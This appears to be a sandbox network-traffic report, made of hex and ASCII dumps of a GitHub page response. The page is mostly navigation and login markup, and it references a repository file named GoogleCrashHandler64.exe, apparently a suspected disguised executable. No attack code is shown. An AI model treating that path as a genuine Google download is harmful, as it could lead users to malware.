                                                                                              2022-08-10 04:48:03 UTC514INData Raw: 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 78 70 6c 6f 72 65 20 47 69 74 48 75 62 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 36 34 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 78 70 6c 6f 72 65 20 47 69 74 48 75 62 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 65 78 70 6c 6f 72 65 22 3e 0a 20 20 20 20 20 20 45 78 70 6c 6f 72 65 20 47 69 74 48 75 62 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61
                                                                                              Data Ascii: ;,&quot;action&quot;:&quot;click to go to Explore GitHub&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe;ref_cta:Explore GitHub;&quot;}" href="/explore"> Explore GitHub</a> </li> <li cla
                                                                                              2022-08-10 04:48:03 UTC515INData Raw: 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 72 65 6e 64 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 36 34 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 72 65 6e 64 69 6e 67 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 72 65 6e 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 54 72 65 6e 64 69 6e 67 0a 3c 2f 61 3e 20 20 3c 2f 6c 69
                                                                                              Data Ascii: eader dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to Trending&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe;ref_cta:Trending;&quot;}" href="/trending"> Trending</a> </li
                                                                                              2022-08-10 04:48:03 UTC517INData Raw: 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 36 34 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 67 75 69 64 65 22 3e 0a 20 20 20 20 20 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                                                                              Data Ascii: uot;click to go to Open source guides&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe;ref_cta:Open source guides;&quot;}" href="https://opensource.guide"> Open source guides</a> </li> <l
                                                                                              2022-08-10 04:48:03 UTC518INData Raw: 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 45 78 70 6c 6f 72 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 6d 6d 75 6e 69 74 79 20 66 6f 72 75 6d 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 36 34 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 6d 6d 75 6e 69 74 79 20 66 6f 72 75 6d 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74
                                                                                              Data Ascii: tegory&quot;:&quot;Header dropdown (logged out), Explore&quot;,&quot;action&quot;:&quot;click to go to Community forum&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe;ref_cta:Community forum;&quot;}" href="htt
                                                                                              2022-08-10 04:48:03 UTC519INData Raw: 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 79 2d 33 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72
                                                                                              Data Ascii: -justify-between flex-items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <a class="HeaderMenu-link no-underline py-3 d-block d-lg-inline-block" data-analytics-event="{&quot;category&quot;:&quot;Header
                                                                                              2022-08-10 04:48:03 UTC521INData Raw: 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 50 6c 61 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65
                                                                                              Data Ascii: -relative Link--primary text-bold py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pricing&quot;,&quot;action&quot;:&quot;click to go to Plans&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/Google
                                                                                              2022-08-10 04:48:03 UTC522INData Raw: 64 20 62 6f 72 64 65 72 2d 74 6f 70 20 70 74 2d 34 20 70 62 2d 32 20 6d 74 2d 33 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 69 63 69 6e 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 64 75 63 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61
                                                                                              Data Ascii: d border-top pt-4 pb-2 mt-3" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Pricing&quot;,&quot;action&quot;:&quot;click to go to Education&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHa
                                                                                              2022-08-10 04:48:03 UTC523INData Raw: 70 65 3d 22 74 65 78 74 22 0a 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 73 6d 20 68 65 61 64 65 72 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 20 6a 75 6d 70 2d 74 6f 2d 66 69 65 6c 64 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 66 69 65 6c 64 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 63 75 73 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 69 65 6c 64 20 69 73 2d 63 6c 65 61 72 61 62 6c 65 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 6f 74 6b 65 79 3d 73 2c 2f 0a 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 71 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 74 65 73 74 2d 73 65 6c 65 63 74 6f 72 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 22 0a 20 20 20 20 20 20
                                                                                              Data Ascii: pe="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input"
                                                                                              2022-08-10 04:48:03 UTC525INData Raw: 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 6f 78 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 64 2d 6e 6f 6e 65 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65
                                                                                              Data Ascii: > <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-ce
                                                                                              2022-08-10 04:48:03 UTC526INData Raw: 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35
                                                                                              Data Ascii: a-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75
                                                                                              2022-08-10 04:48:03 UTC527INData Raw: 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20
                                                                                              Data Ascii: one js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
                                                                                              2022-08-10 04:48:03 UTC529INData Raw: 3d 22 73 63 6f 70 65 64 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6d 72 2d 32 20 74 65 78 74 2d 63 65 6e 74 65 72 20 64 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 52 65 70 6f 73 69 74 6f 72 79 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75
                                                                                              Data Ascii: ="scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="tru
                                                                                              2022-08-10 04:48:03 UTC530INData Raw: 35 2e 37 35 76 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 31 2e 35 20 30 76 2d 33 2e 35 41 2e 37 35 2e 37 35 20 30 20 30 30 38 20 33 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 53 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65
                                                                                              Data Ascii: 5.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-se
                                                                                              2022-08-10 04:48:03 UTC531INData Raw: 75 73 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 6a 75 6d 70 22 3e 0a 20 20 20 20 20 20 4a 75 6d 70 20 74 6f 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 6c 2d 31 20 76 2d 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 22 3e e2 86 b5 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 77 6e 65 72 2d 73 63 6f 70 65
                                                                                              Data Ascii: us js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle"></span> </div> </a></li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scope
                                                                                              2022-08-10 04:48:03 UTC533INData Raw: 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20
                                                                                              Data Ascii: on-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0
                                                                                              2022-08-10 04:48:03 UTC534INData Raw: 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 53 65 61 72 63 68 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20 47 69 74 48 75 62 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 61 72 69 61 2d 68
                                                                                              Data Ascii: ass="js-jump-to-badge-search-text-default d-none" aria-label="in all of GitHub"> Search </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-h
                                                                                              2022-08-10 04:48:03 UTC535INData Raw: 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 37 32 20 31 2e 30 35 41 32 2e 34 39 35 20 32 2e 34 39 35 20 30 20 30 31 32 20 31 31 2e 35 76 2d 39 7a 6d 31 30 2e 35 2d 31 56 39 68 2d 38 63 2d 2e 33 35 36 20 30 2d 2e 36 39 34 2e 30 37 34 2d 31 20 2e 32 30 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2d 2e 32 76 2d 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 32 35
                                                                                              Data Ascii: 0-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25
                                                                                              2022-08-10 04:48:03 UTC537INData Raw: 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 20 64 2d 6e 6f 6e 65 22 20 61 6c 74 3d 22 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 66 6c 65 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 74 65 78 74 2d 6c 65
                                                                                              Data Ascii: </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-le
                                                                                              2022-08-10 04:48:03 UTC538INData Raw: 2d 73 68 72 69 6e 6b 2d 30 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 70 61 79 6c 6f 61 64 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 6f 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55
                                                                                              Data Ascii: -shrink-0 no-underline" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_U
                                                                                              2022-08-10 04:48:03 UTC539INData Raw: 37 44 47 37 59 32 61 67 22 20 2f 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 3e 0a 20 20 20 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 0a 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 62 6c 6f 63 6b 20 6a 73 2d 6c 6f 67 69 6e 2d 66 69 65 6c 64 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 72 72 65 63 74 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 61
